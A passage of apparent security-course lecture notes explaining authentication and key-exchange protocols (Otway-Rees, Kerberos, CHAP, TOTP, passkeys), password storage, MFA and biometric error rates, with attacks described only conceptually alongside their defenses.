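response = enc(kab_alice, dec(kab_alice, challenge) - 1)  # Alice returns NB - 1
assert dec(kab_bob, response) == NB - 1
print("mutual authentication complete")
```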

Denning-Sacco Modification: Using Timestamps to Prevent Key Replay Attacks

A major flaw in the Needham-Schroeder protocol is its vulnerability to key replay attacks. This occurs when an attacker, Eve, captures a valid ticket (the message from Trent that is encrypted for Bob and contains the session key) and replays it later to impersonate Alice.

How the Attack Works:

Step 1. Alice initiates a communication session with Bob by sending a ticket encrypted for Bob.

Step 2. The ticket contains:

  • Alice’s ID
  • Session key (KAB)

Step 3. If Eve manages to capture and later decrypt the session key (perhaps through cryptanalysis or a key compromise), she can replay the ticket to Bob.

Step 4. Since Bob has no way to distinguish between an old ticket and a new one, he accepts the session key and proceeds with authentication.

Step 5. Eve, now in possession of KAB, successfully authenticates as Alice and communicates with Bob, who mistakenly believes he is talking to Alice.

To mitigate this attack, Denning & Sacco proposed a simple but effective fix: include a timestamp inside the ticket when it is generated by Trent (the trusted third party):

  • When Trent creates the ticket that Alice will later forward to Bob, he encrypts it using Bob’s secret key and includes:
    • Alice’s ID
    • Session key (KAB)
    • A timestamp (TA)
  • When Bob receives the ticket, he checks the timestamp. If the timestamp is too old (e.g., outside an acceptable time window), Bob rejects the ticket, assuming it is a replay attack. If the timestamp is recent, Bob proceeds with authentication.

This fix works because old tickets cannot be reused: a previously captured ticket becomes useless once its time window has expired.
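The freshness check Bob performs can be sketched directly; the 60-second acceptance window below is an assumed value (real deployments tune it to cover clock skew and network delay):

```python
import time

MAX_AGE = 60.0  # assumed acceptance window, in seconds

def make_ticket(sender_id, session_key):
    """Trent stamps the ticket at creation time (inside the encrypted ticket)."""
    return {"id": sender_id, "key": session_key, "ts": time.time()}

def accept_ticket(ticket, now=None):
    """Bob rejects tickets older than the window, defeating ticket replay."""
    now = time.time() if now is None else now
    return (now - ticket["ts"]) <= MAX_AGE

fresh = make_ticket("Alice", "KAB")
print(accept_ticket(fresh))                          # fresh ticket: accepted
print(accept_ticket(fresh, now=time.time() + 3600))  # hour-old replay: rejected
```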

Otway-Rees Protocol: Session IDs Instead of Timestamps

One challenge with the Denning-Sacco modification is that it relies on synchronized clocks across all entities. If Bob’s clock is significantly out of sync with Trent’s, he might:

  • Falsely accept an old ticket, leading to a replay attack.
  • Falsely reject a valid ticket, disrupting communication.

An attacker (Eve) could manipulate time synchronization by:

  • Injecting fake NTP (Network Time Protocol) responses to mislead Bob’s system clock.
  • Generating fake GPS signals to deceive devices relying on GPS for time synchronization.

Since time synchronization itself introduces vulnerabilities, the Otway-Rees protocol replaces timestamps with session IDs to prevent replay attacks without relying on clocks.

The steps in this protocol are:

Step 1: Alice Initiates a Communication Request

Alice sends a message to Bob that includes:

  • A unique session ID (S) to track this exchange.
  • Both Alice’s and Bob’s IDs (to establish who is communicating).
  • A message encrypted with Alice’s secret key, containing:
    • Alice’s and Bob’s IDs.
    • A random nonce, r1.
    • The session ID (S) (ensuring it matches throughout the exchange).

Step 2: Bob Forwards the Request to Trent (Trusted Third Party)

Bob receives Alice’s message and sends Trent:

  • Alice’s original message.
  • A message encrypted with Bob’s secret key, containing:
    • Alice’s and Bob’s IDs (confirming he agrees to communicate with Alice).
    • A random nonce, r2.
    • The same session ID (S).

Now, Trent sees the same session ID in both encrypted messages, proving:

  • Alice initiated the request to talk to Bob.
  • Bob agrees to talk to Alice.
  • It really is Bob because Bob was able to create a message containing the session ID and encrypt it with his secret key.

Step 3: Trent Generates and Distributes the Session Key

Once Trent verifies the request, he:

  • Generates a random session key (KAB) for Alice and Bob.
  • Encrypts KAB along with Alice’s nonce, r1, for Alice using Alice’s secret key.
  • Encrypts KAB along with Bob’s nonce, r2, for Bob using Bob’s secret key.
  • Sends both encrypted session keys to Bob, along with the session ID (S).

Bob then forwards Alice’s encrypted key to her.

The Otway-Rees protocol is secure because:

  • Prevents replay attacks: even if an attacker replays an old message, the session ID must match in all encrypted exchanges.
  • Does not require synchronized clocks: this eliminates the risk of time-based attacks.
  • Ensures mutual agreement: Trent confirms that both Alice and Bob want to communicate.
  • Incorporates nonces: Trent’s response includes each party’s nonce, so an attacker cannot pair a new session ID with old (even cracked) encrypted session keys and replay them to Bob.
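Trent's consistency check can be sketched as follows. The dicts stand in for the two encrypted requests after Trent decrypts them, and the session-ID values are made up:

```python
def trent_check(alice_msg, bob_msg):
    """Trent issues a session key only if both decrypted requests carry the
    same session ID and agree on who is talking to whom."""
    same_session = alice_msg["S"] == bob_msg["S"]
    same_parties = alice_msg["ids"] == bob_msg["ids"]
    return same_session and same_parties

alice_part = {"S": 7341, "ids": ("Alice", "Bob"), "nonce": "r1"}
bob_part   = {"S": 7341, "ids": ("Alice", "Bob"), "nonce": "r2"}
replayed   = {"S": 1002, "ids": ("Alice", "Bob"), "nonce": "r1"}  # stale session ID

print(trent_check(alice_part, bob_part))  # matching session IDs: key issued
print(trent_check(replayed, bob_part))    # mismatch: request rejected
```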

Kerberos

Kerberos is a trusted authentication, authorization, and key exchange protocol that uses symmetric cryptography. It is based on the Needham-Schroeder protocol, incorporating the Denning-Sacco modification (timestamps) to prevent replay attacks.

When Alice wants to communicate securely with Bob (who may be another user or a service), she must first request access from Kerberos. If authorized, Kerberos provides her with two encrypted messages:

  1. A message encrypted with Alice’s secret key, containing:
    • A session key (KAB) for secure communication with Bob.
  2. A ticket encrypted with Bob’s secret key (which Alice cannot read), containing:
    • The same session key (KAB).

Alice forwards the ticket to Bob. When Bob decrypts it using his secret key, he:

  • Confirms that Kerberos issued the ticket since only Kerberos knows his secret key.
  • Obtains KAB, which he shares with Alice.

Now that both Alice and Bob have the session key, they can securely communicate by encrypting messages using KAB.

Preventing Replay Attacks: Mutual Authentication

To ensure that Alice is legitimate, she must prove she can extract the session key sent by Kerberos. She does this by:

  1. Generating a new timestamp (TA).
  2. Encrypting TA with KAB and sending it to Bob.

Bob verifies that the timestamp is recent and then authenticates himself to Alice by:

  1. Incrementing TA by 1.
  2. Encrypting the modified value with KAB and sending it back to Alice.

Since only Bob could have decrypted TA and modified it, Alice knows she is talking to the real Bob.
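The timestamp exchange can be traced with mock encryption (tagged tuples standing in for symmetric encryption with KAB; a real implementation would use an authenticated cipher):

```python
import time

def enc(key, payload):   # mock symmetric encryption with the session key
    return ("enc", key, payload)

def dec(key, box):
    tag, k, payload = box
    assert tag == "enc" and k == key, "wrong key"
    return payload

KAB = "session-key"   # established via the Kerberos ticket exchange

# Alice proves she extracted KAB by encrypting a fresh timestamp with it.
TA = time.time()
to_bob = enc(KAB, TA)

# Bob checks freshness, then returns TA + 1 to prove he also holds KAB.
ta = dec(KAB, to_bob)
assert abs(time.time() - ta) < 60, "stale authenticator"
to_alice = enc(KAB, ta + 1)

# Alice verifies Bob's reply.
assert dec(KAB, to_alice) == TA + 1
print("Alice and Bob are mutually authenticated")
```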

Avoiding frequent password prompts

Without optimization, Alice would need to enter her password every time she requests a service, since her secret key is needed to decrypt the session key for each request. Caching her key in a file would be a security risk.

To solve this, Kerberos is divided into two components:

  1. Authentication Server (AS):
  • Handles initial user authentication.
  • Issues a session key for Alice to communicate with the Ticket Granting Server (TGS).
  • This session key can be cached, avoiding repeated password entry.
  2. Ticket Granting Server (TGS):
  • Handles requests for services (e.g., accessing Bob’s server).
  • Issues a new session key for Alice’s communication with the specific service.
  • Provides a ticket, which Alice presents to the service instead of entering credentials again.

Authentication Protocols

In the next family of protocols, we will look at mechanisms that focus only on authentication and not key exchange.

Public key authentication

Public key authentication is based on the use of nonces (random values) to verify that a party possesses a specific private key—without ever revealing that key. This process is conceptually similar to the challenge-response mechanism used in the Needham-Schroeder protocol.

If Alice wants to authenticate Bob, she must verify that Bob possesses his private key. Since private keys are never shared, Alice uses a challenge-response mechanism:

  1. Alice generates a nonce (a random value) and sends it to Bob as a challenge.
  2. Bob encrypts the nonce using his private key and sends the result back to Alice.
  3. Alice decrypts Bob’s response using Bob’s public key:
    • If the decrypted value matches the original nonce, Alice confirms that Bob must have the corresponding private key.
    • Since only Bob should possess his private key, Alice can trust that she is communicating with the real Bob.

For mutual authentication, Bob must also verify Alice’s identity. Instead of each party individually initiating a challenge-response cycle, they can combine their authentication steps into a single exchange, making the process more efficient:

  1. Alice and Bob generate their own nonces (NA and NB).
  2. Alice sends Bob her nonce (NA).
  3. Bob encrypts NA using his private key and also sends Alice his own nonce (NB).
  4. Alice decrypts Bob’s response using Bob’s public key. If the decrypted value matches NA, Alice confirms Bob’s identity.
  5. Alice encrypts NB with her private key and sends it back to Bob.
  6. Bob decrypts Alice’s response using Alice’s public key. If the decrypted value matches NB, Bob confirms Alice’s identity.

At this point, both Alice and Bob have authenticated each other, completing mutual authentication in just one additional round-trip message instead of two separate exchanges.

Note that you can create variations of the protocol. For instance, Alice can send Bob her nonce encrypted with Bob’s public key so that only he can decode it.

Regardless of the variation, the idea is for one party to prove that they can use their private key (which nobody else has) to encode or decode something that the other party sends them.
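The combined exchange can be traced with two toy textbook-RSA keypairs (far too small to be secure; "signing" is shown as raw modular exponentiation of the nonce with the private exponent):

```python
import secrets

# Toy textbook-RSA keypairs: (n, e) is public, d is private, e*d = 1 mod phi(n).
ALICE = {"n": 3233, "e": 17, "d": 2753}   # p=61, q=53
BOB   = {"n": 3127, "e": 3,  "d": 2011}   # p=53, q=59

def sign(key, m):
    """Encode m with the private key; only the key's owner can do this."""
    return pow(m, key["d"], key["n"])

def check(key, m, sig):
    """Decode with the public key and confirm the original nonce reappears."""
    return pow(sig, key["e"], key["n"]) == m

NA = secrets.randbelow(3000) + 1   # Alice's nonce (kept below both toy moduli)
NB = secrets.randbelow(3000) + 1   # Bob's nonce

# Steps 1-3: Alice sends NA; Bob replies with sign_B(NA) plus his own nonce NB.
sig_b, nb = sign(BOB, NA), NB

# Step 4: Alice verifies with Bob's public key, confirming Bob's identity.
assert check(BOB, NA, sig_b), "not the real Bob"

# Step 5: Alice returns sign_A(NB).
alice_reply = sign(ALICE, nb)

# Step 6: Bob verifies with Alice's public key, confirming Alice's identity.
assert check(ALICE, NB, alice_reply), "not the real Alice"
print("mutual authentication complete")
```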

Incorporating X.509 Certificates for Identity Verification

While public key authentication proves that an entity possesses a private key, it does not inherently verify the entity’s identity. An attacker could generate their own key pair and falsely claim to be Bob. To address this, X.509 certificates bind public keys to specific identities.

An X.509 certificate, issued by a trusted Certificate Authority (CA), contains:

  • The entity’s public key.
  • The entity’s identity (such as a domain name, email, or organizational details).
  • The CA’s digital signature, proving the certificate’s authenticity.

Before using Bob’s public key, Alice can first request and verify Bob’s X.509 certificate, ensuring:

  • The certificate is issued by a trusted CA.
  • The certificate has not expired or been revoked.
  • The entity information in the certificate matches Bob’s claimed identity.

If Bob’s certificate is valid, Alice can confidently use Bob’s public key, mitigating the risk of impersonation. This approach is widely used in TLS (Transport Layer Security) to secure web communications, where websites present certificates to allow users to verify their authenticity.

Password Authentication Protocol (PAP)

The most basic form of authentication relies on reusable passwords, known as the Password Authentication Protocol (PAP).

  1. The system prompts the user to identify themselves (e.g., entering a login name).
  2. The user enters their password.
  3. If the password matches the one stored for that login, authentication is successful.

While simple, PAP is vulnerable to attacks such as password guessing, brute force, and credential leaks.

Password guessing defenses

To defend against password-guessing attacks, we need to make it infeasible to try a large number of passwords. A common approach is to rate-limit guesses: when the system detects an incorrect password, it waits several seconds before allowing the user to try again. Linux, for example, waits about three seconds. After five bad guesses, it terminates and restarts the login process.

Another approach is to disallow password guessing entirely after a certain number of failed attempts by locking the account. This is common for some web-based services, such as banks. However, the system is now vulnerable to a denial-of-service (DoS) attack: an attacker may not be able to take your money but can inconvenience you by locking you out of your own account.

Hashed passwords

A major weakness of the Password Authentication Protocol (PAP) is that if an attacker gains access to the password file, they obtain all user credentials. To mitigate this risk, systems store hashed passwords instead of plaintext passwords.

Instead of storing actual passwords, the system stores their cryptographic hashes, taking advantage of the one-way property of hash functions:

  1. When a user enters a password, the system computes: hash(password).
  2. The system compares the computed hash with the stored hash.
  3. If they match, authentication is successful.
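A minimal sketch of PAP with hashed storage, using SHA-256 (real systems use salted, deliberately slow hashes such as bcrypt, scrypt, or Argon2 rather than a bare fast hash):

```python
import hashlib

stored = {}  # the "password file": username -> hex digest of the password

def register(user: str, password: str) -> None:
    """Store only the hash, never the plaintext password."""
    stored[user] = hashlib.sha256(password.encode()).hexdigest()

def login(user: str, password: str) -> bool:
    """Hash the entered password and compare against the stored hash."""
    return stored.get(user) == hashlib.sha256(password.encode()).hexdigest()

register("alice", "correct horse battery staple")
print(login("alice", "correct horse battery staple"))  # hashes match: success
print(login("alice", "wrong guess"))                   # mismatch: failure
```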

Since hashes cannot be reversed, an attacker who steals the password file cannot directly recover the original passwords—they must resort to brute-force or dictionary attacks:

  1. Brute-Force Attacks: An attacker systematically tries every possible password until they find one that matches a stored hash.

  2. Dictionary Attacks: Instead of trying all possible combinations, an attacker tests common passwords (e.g., dictionary words, known passwords, common letter-number substitutions).

  3. Precomputed Hash Attacks (Rainbow Tables): Attackers can precompute hashes of millions of common passwords and store them in a lookup table. If a system-stored hash matches one in the table, the attacker immediately knows the corresponding password. This makes cracking many passwords at once much faster.

Salting to Prevent Precomputed Attacks

To prevent attackers from using precomputed hashes, systems introduce a random value called a “salt” when hashing passwords.

Before hashing, the system concatenates the password with a unique salt: hash(salt + password). The salt is stored in plaintext alongside the hashed password in the database (the password file). Even if two users have the same password, their hashes will be different due to different salts.

Why Salt is Effective:

  • Defeats rainbow table attacks – Attackers would need to precompute an entire hash table for each possible salt value, making the approach infeasible.
  • Prevents identical hashes for identical passwords – Even if multiple users have the same password, their stored hashes will be different, so an attacker cannot tell whether users share the same password.
  • Forces attackers to crack passwords individually – Instead of applying a single precomputed attack to all users, an attacker must brute-force each password separately, increasing computational cost.
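A short demonstration of salted hashing: two users who pick the identical password end up with different stored hashes, so a single precomputed table cannot crack both:

```python
import hashlib, secrets

def hash_password(password: str, salt: str = None):
    """Compute hash(salt + password); both salt and digest go in the password file."""
    salt = secrets.token_hex(16) if salt is None else salt
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return salt, digest

def verify(password: str, salt: str, digest: str) -> bool:
    """Re-hash the candidate password with the stored salt and compare."""
    return hash_password(password, salt)[1] == digest

# Two users choose the identical password, yet their stored hashes differ:
s1, h1 = hash_password("hunter2")
s2, h2 = hash_password("hunter2")
print(h1 != h2)                   # different salts -> different hashes
print(verify("hunter2", s1, h1))  # verification still works per user
```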

Spraying and Stuffing attacks

Password Spraying:
Password spraying is an attack where an attacker tries a small number of common passwords (e.g., “123456” or “password”) across a large number of accounts. Unlike brute force attacks that target a single account with multiple passwords, password spraying avoids detection by limiting the number of attempts per account, making it harder for security systems to flag the activity.
Credential Stuffing:
Credential stuffing is an attack where attackers use a large list of previously leaked or stolen username and password combinations to try logging into various systems. Since many users reuse passwords across multiple services, attackers rely on these credentials working for other accounts. Automated tools are often used to test the credentials on multiple platforms quickly.

Password recovery options

Passwords are a weak form of security. English text has low entropy (approximately 1.2–1.5 bits per character), and user-chosen passwords are often easy to guess. Password files from some high-profile sites have been obtained and confirm just how bad many people are at picking passwords: over 90% of all user passwords sampled appear on a list of the top 1,000 passwords, and the most common password is password. People also tend to reuse passwords, so if an attacker can get passwords from one place, there is a good chance that many will work with other services.

Despite many people picking bad passwords, people often forget them, especially when they are trying to be good and use different passwords for different accounts. There are several common ways of handling forgotten passwords, none of them great:

Email them:
This used to be a common solution and should be dying off. It requires that the server stores the password, which means it is not stored as a hash. This exposes the risk that anyone seeing your email will see your password.
Reset them:
This is more common but requires authenticating the requestor to avoid a denial of service attack. The common thing to do is to send a password reset link to an email address entered when the account was created. We again have the problem that if someone has access to your mail, they will have access to the password reset link and can create a new password for your account. In both these cases, we have the problem that users may no longer have the same email address. Think of the people who switched from Comcast to get Verizon FiOS and switched their comcast.net addresses to verizon.net (note: avoid using email addresses tied to services or locations that you might change).
Provide hints:
This is common for system logins (e.g. macOS and Windows). However, a good hint may weaken the password or may not help the user.
Ask questions:
It is common for sites to ask questions (“what was your favorite pet’s name?”, “what street did you live on when you were eight years old?”). The answers to many of these questions can often be found through a bit of searching or via social engineering. A cleverer approach is to give unpredictable answers (“what was your favorite pet’s name?” “Osnu7$Qbv999”), but that requires storing the answers somewhere.
Rely on users to write them down:
This is fine as long as the threat model is electronic-only and you don’t worry about someone physically searching for your passwords.

One-time Passwords (OTPs)

The other problem with reusable passwords is that if a network is insecure, an eavesdropper may sniff the password from the network. A potential intruder may also simply observe the user typing a password. To thwart this, we can turn to one-time passwords. If someone sees you type a password or gets it from the network stream, it won’t matter because that password will be useless for future logins.

There are three forms of one-time passwords:

  1. Sequence-based. Each password is a function of the previous password. S/Key is an example of this.

  2. Challenge-based. A password is a function of a challenge provided by the server. CHAP is an example of this.

  3. Time-based. Each password is a function of the current time. TOTP and RSA’s SecurID are examples of this.

Sequence-based: S/Key

S/Key authentication is a one-time password (OTP) system that generates a sequence of passwords using a one-way function. Each password in the sequence is derived from the previous one, ensuring that passwords are used in reverse order for authentication.

  1. A user or administrator selects an initial secret (the seed).
  2. A one-way function f is repeatedly applied to generate a sequence of passwords: password[n] = f(password[n−1])
  3. The system stores only the final computed password: password[N].
  4. Each time the user authenticates, they provide the next password in the reverse sequence:
    • The first authentication uses password[N−1].
    • The second authentication uses password[N−2].
    • This continues until all passwords in the list are used.
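The hash chain and its reverse-order verification can be sketched directly (the seed value and chain length are arbitrary):

```python
import hashlib

def f(x: bytes) -> bytes:
    """The one-way function used to build the chain."""
    return hashlib.sha256(x).digest()

N = 100
seed = b"initial secret"

# Build the chain: password[0] = seed, password[i] = f(password[i-1]).
chain = [seed]
for _ in range(N):
    chain.append(f(chain[-1]))

server_stored = chain[N]   # the server keeps only the final value

def authenticate(candidate: bytes) -> bool:
    """Accept if f(candidate) matches the stored value, then roll the store back
    so the next login must present the previous link in the chain."""
    global server_stored
    if f(candidate) == server_stored:
        server_stored = candidate
        return True
    return False

print(authenticate(chain[N - 1]))  # first login uses password[N-1]: accepted
print(authenticate(chain[N - 1]))  # a sniffed password cannot be replayed
print(authenticate(chain[N - 2]))  # second login uses password[N-2]: accepted
```

The one-way property of f means an eavesdropper who sees password[N−1] cannot compute password[N−2], the next password that will be accepted.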

Challenge-based: CHAP

The Challenge-Handshake Authentication Protocol (CHAP) is an authentication mechanism that allows a server to verify a user’s identity without transmitting the password over the network.

CHAP is based on a shared secret (essentially a password) that both the client and server know. Authentication follows these steps:

  1. Challenge: The server generates a random nonce (a unique random value), called a challenge, and sends it to the client.
  2. Response: The client computes a hash of the shared secret combined with the nonce and sends the result back to the server.
  3. Verification: The server performs the same hash calculation using its stored copy of the shared secret. If the computed hash matches the one sent by the client, authentication succeeds. Otherwise, authentication fails.

With CHAP:

  • The password is never transmitted, only a hash of the password with a random challenge. An intruder that sees this hash cannot extract the original data.
  • Since the challenge (nonce) changes for each authentication attempt, an attacker cannot reuse an old response.
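One CHAP round can be sketched with HMAC-SHA256 combining the shared secret and the challenge (classic CHAP as defined in RFC 1994 uses MD5; HMAC is the safer modern construction and is shown here instead):

```python
import hmac, hashlib, secrets

SHARED_SECRET = b"chap-shared-secret"   # known to both client and server

def server_challenge() -> bytes:
    """A fresh random nonce for every authentication attempt."""
    return secrets.token_bytes(16)

def client_response(secret: bytes, challenge: bytes) -> bytes:
    """Hash of the shared secret combined with the challenge; the secret
    itself never crosses the network."""
    return hmac.new(secret, challenge, hashlib.sha256).digest()

def server_verify(secret: bytes, challenge: bytes, response: bytes) -> bool:
    """Server recomputes the same hash and compares in constant time."""
    expected = hmac.new(secret, challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)

nonce = server_challenge()
resp = client_response(SHARED_SECRET, nonce)
print(server_verify(SHARED_SECRET, nonce, resp))               # success
# A captured response is useless against the next, different challenge:
print(server_verify(SHARED_SECRET, server_challenge(), resp))  # replay fails
```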

Challenge-based: Passkeys

Passkey authentication is a modern implementation of public key authentication designed to eliminate the need for passwords. Instead of relying on traditional credentials, passkeys use cryptographic public-private key pairs to authenticate users securely.

Enrollment

  1. The user logs into a service using a legacy authentication method (e.g., username-password, OTP, or SMS verification).
  2. The user’s device generates a unique public-private key pair for that specific service.
  3. The public key is sent to the service and stored with the user’s account, replacing the need for a password.
  4. The private key remains securely stored on the user’s device.

Authentication (login)

  1. The user provides their username to the service.
  2. The server generates a random challenge (at least 16 bytes long) and sends it to the user.
  3. The user’s device retrieves the private key associated with the service. This might use on-device biometric authentication (Face ID, Touch ID), a device PIN, or an on-device password. The user’s device then uses the private key to digitally sign the challenge.
  4. The signed response is sent back to the service.
  5. The service retrieves the user’s public key, which was stored during enrollment.
  6. It verifies the digital signature against the challenge. If the signature is valid, the server confirms that the user possesses the corresponding private key and grants access.
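Enrollment and login can be sketched with a toy textbook-RSA pair standing in for the device's passkey (illustrative key sizes only; real passkeys use WebAuthn with full-size ECDSA or EdDSA keys, and the signing step is gated by on-device biometrics or a PIN):

```python
import secrets

# Toy keypair standing in for the device-held passkey.
PUB = {"n": 3233, "e": 17}     # sent to the service at enrollment
PRIV = {"n": 3233, "d": 2753}  # never leaves the user's device

registry = {}   # server side: username -> stored public key

def enroll(user: str, public_key: dict) -> None:
    """Enrollment: the service stores the public key with the account."""
    registry[user] = public_key

def device_sign(challenge: int) -> int:
    """Device signs the challenge with the private key (after local unlock)."""
    return pow(challenge, PRIV["d"], PRIV["n"])

def server_login(user: str, challenge: int, signature: int) -> bool:
    """The service verifies the signature against its stored public key."""
    pub = registry[user]
    return pow(signature, pub["e"], pub["n"]) == challenge

enroll("alice", PUB)
challenge = secrets.randbelow(3000) + 1   # server's random challenge
print(server_login("alice", challenge, device_sign(challenge)))      # accepted
print(server_login("alice", challenge + 1, device_sign(challenge)))  # rejected
```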

Time-based: TOTP

TOTP (Time-based One-Time Password) is a widely used authentication method that generates a temporary code based on a shared secret key and the current time.

It applies an HMAC (Hash-based Message Authentication Code) function using the secret key and a time-based counter, typically in 30-second intervals. The server independently computes the expected OTP using the same key and time window, allowing authentication if the values match. Since TOTP codes expire quickly, they provide strong protection against replay attacks.
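TOTP is small enough to implement directly from the RFCs: HOTP (RFC 4226) truncates an HMAC-SHA-1 of a counter, and TOTP (RFC 6238) sets that counter to the number of 30-second intervals since the epoch. The values printed below are the published RFC test vectors:

```python
import hmac, hashlib, struct, time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA-1 of the counter, dynamically truncated to N digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                              # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, at: float = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP where the counter counts 30-second steps since the epoch."""
    t = time.time() if at is None else at
    return hotp(secret, int(t // step), digits)

secret = b"12345678901234567890"        # the RFC test-vector secret
print(hotp(secret, 0))                   # 755224 (RFC 4226 test vector)
print(totp(secret, at=59, digits=8))     # 94287082 (RFC 6238 test vector)
```

The server runs the same computation with its copy of the secret and accepts the code if it matches for the current (or an adjacent) time step.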

TOTP is often used as a second factor (proof that you have some device with the secret configured in it) in addition to a password. The protocol is widely supported by companies such as Amazon, Dropbox, WordPress, Microsoft, and Google.

Counter-based: HOTP

HOTP (HMAC-based One-Time Password) generates one-time passwords using a shared secret and an incrementing counter. It is essentially the same as TOTP except that it uses a counter instead of the current time.

Each time an authentication attempt is made, the counter advances on both the client and server to ensure the password is not reused.

Unlike TOTP, HOTP does not expire after a set time, making it more vulnerable to replay attacks but eliminating the need for time synchronization. It is defined in RFC 4226 and is commonly implemented in hardware tokens like YubiKey for MFA (Multi-Factor Authentication).

Since HOTP is not time-based, users can enter a code at any time before the next one is generated. However, it requires keeping counters synchronized between the client and the service.

Push notifications

Push notifications rely on sending a notification via phone-based SMS messaging (or sometimes email) to validate that a user is in possession of their device (the “something you have” factor). They are often used as a second factor in multi-factor authentication.

Second Factor Authentication with Push Notifications:
This method adds an additional layer of security by sending a push notification to the user’s registered device during login attempts. The user must approve the notification to complete authentication, ensuring that even if credentials are compromised, unauthorized access is prevented.

MFA Fatigue occurs when users are overwhelmed by frequent multi-factor authentication (MFA) requests, leading to careless behavior, such as approving authentication requests without proper verification. Attackers can exploit this by repeatedly sending prompts in hopes that the user will approve one out of frustration or by mistake, granting unauthorized access. This type of fatigue can weaken the security benefits of MFA.

Number Matching Authentication:
Number matching authentication is a technique where the user is presented with a randomly generated number on the device they are logging into, and they must confirm by entering the same number on their second factor device (e.g., mobile phone). This prevents unauthorized approval of login attempts, reducing phishing risks.

Risk-Based Authentication (RBA)

Risk-Based Authentication (RBA) is an adaptive security mechanism that dynamically adjusts authentication requirements based on the risk level of a login attempt. Instead of applying the same level of security for every login, RBA evaluates various factors to determine whether additional authentication steps are necessary.

These factors include geolocation, device and browser information, IP address reputation, and behavioral patterns such as the time and frequency of login attempts.

If a user logs in from a familiar device and location, standard authentication may be sufficient. However, if the system detects an unusual login, such as an attempt from a different country or an unfamiliar device, it may prompt the user for additional verification, such as multi-factor authentication (MFA) or email confirmation.
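The decision logic can be sketched as a score-and-threshold function; the signals, weights, and threshold below are all invented for illustration:

```python
def risk_score(login: dict) -> int:
    """Sum hypothetical risk weights for each suspicious signal."""
    score = 0
    if login["country"] != login["usual_country"]:
        score += 2        # login from an unusual country
    if not login["known_device"]:
        score += 2        # unfamiliar device or browser
    if login["ip_flagged"]:
        score += 3        # IP address with a bad reputation
    if login["hour"] not in login["usual_hours"]:
        score += 1        # login at an unusual time
    return score

def required_auth(login: dict) -> str:
    """Step up to MFA only when the risk score crosses the threshold."""
    return "mfa" if risk_score(login) >= 3 else "password"

familiar = {"country": "US", "usual_country": "US", "known_device": True,
            "ip_flagged": False, "hour": 9, "usual_hours": range(7, 23)}
suspicious = dict(familiar, country="RU", known_device=False)

print(required_auth(familiar))    # low risk: no extra friction
print(required_auth(suspicious))  # unusual country + new device: step up to MFA
```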

By adapting security measures to context, RBA flags risky logins and requires additional verification only when needed. Low-risk users see fewer MFA prompts, while suspicious login attempts face stronger protections. This balance of security and convenience yields a more seamless yet secure authentication experience.

Adversary-in-the-Middle (AitM) Attacks

Authentication protocols can be vulnerable to Adversary-in-the-Middle (AitM) attacks, also commonly referred to as Man-in-the-Middle (MitM) attacks or Machine-in-the-Middle attacks.

In this attack, a malicious actor intercepts communication between two parties and impersonates each one to the other.

For example, Alice believes she is communicating with Bob, but in reality, she is talking to Mike, the attacker in the middle. At the same time, Mike is also communicating with Bob, relaying messages between them. This allows Mike to observe the conversation without raising suspicion. Once authentication is completed, Mike can either drop Alice and continue communicating directly with Bob while impersonating her or remain in the middle, eavesdropping and altering messages as needed.

Protocols resistant to AitM attacks use trusted key exchange mechanisms to establish an encrypted channel that prevents interception. For instance, in Kerberos, both Alice and Bob receive a session key that is encrypted specifically for each of them. Since the session key remains confidential, Mike cannot access it even if he intercepts their communication.

Public key cryptography, however, requires additional safeguards against AitM attacks. If Mike intercepts a key exchange, he can substitute his own public key and deceive Bob into thinking he is Alice. To prevent this, Alice sends Bob a session key that is encrypted with Bob’s public key and digitally signed with her private key. Mike cannot decrypt a session key that was encrypted for Bob, and he cannot forge Alice’s signature to substitute a key of his own, ensuring secure communication between Alice and Bob.

By using cryptographic techniques such as mutual authentication, digital signatures, and secure key exchanges, authentication protocols can effectively defend against Adversary-in-the-Middle attacks, ensuring that communication remains secure and tamper-proof.

Biometric authentication

Biometric authentication is the process of identifying a person based on their physical or behavioral characteristics as opposed to their ability to remember a password or their possession of some device. It is the third of the three factors of authentication: something you know, something you have, and something you are.

It is also fundamentally different than the other two factors because it does not deal with data that lends itself to exact comparisons. For instance, sensing the same fingerprint several times will not likely give you identical results each time. The orientation may differ, the pressure and angle of the finger may result in some parts of the fingerprint appearing in one sample but not the other, and dirt, oil, and humidity may alter the image. Biometric authentication relies on pattern recognition and thresholds: we have to determine whether two patterns are close enough to accept them as being the same.

The false acceptance rate (FAR) is the rate at which biometric samples from different sources (e.g., fingerprints from two different people) are incorrectly accepted as a match. The false rejection rate (FRR) is the rate at which samples from the same person are incorrectly rejected as a match. Based on the properties of the biometric data, the sensor, the feature extraction algorithms, and the comparison algorithms, each biometric device has a characteristic ROC (Receiver Operating Characteristic) curve. The name derives from early work on RADAR and maps the false acceptance rate versus the false rejection rate for a given biometric authentication device. For password authentication, the “curve” would be a single point at the origin: no false accepts and no false rejects. For biometric authentication, which is based on thresholds that determine whether the match is “close enough”, we have a curve.

At one end of the curve, we can have an incredibly low false acceptance rate (FAR). This is good as it means we will not have false matches: the enemy stays out. However, it also means the false rejection rate (FRR) will be very high. If you think of a fingerprint biometric, the stringent comparison needed to yield a low FAR means that the algorithm will not be forgiving of a speck of dirt, light pressure, or a finger held at a different angle. We get high security at the expense of inconveniencing legitimate users, who may have to present their finger repeatedly for sensing, hoping that it will eventually be accepted.

At the other end of the curve, we have a very low false rejection rate (FRR). This is good since it provides convenience to legitimate users. Their biometric data will likely be accepted as legitimate, and they will not have to deal with the frustration of re-sensing their biometric, hoping that their finger is clean, not too greasy, not too dry, and pressed at the right angle with the correct pressure. The trade-off is that it’s more likely that another person’s biometric data will be considered close enough as well and accepted as legitimate.

Numerous biological components can be measured. They include fingerprints, irises, blood vessels on the retina, hand geometry, facial geometry, facial thermographs, and many others. Data such as signatures and voice can also be used, but these often vary significantly with one’s state of mind (your voice changes if you’re tired, ill, or angry). These are behavioral characteristics rather than purely physical ones, such as your iris patterns, the length of your fingers, or fingerprints, and they tend to have lower recognition rates. Other behavioral biometrics include keystroke dynamics, mouse use characteristics, gait analysis, and even cognitive tests.

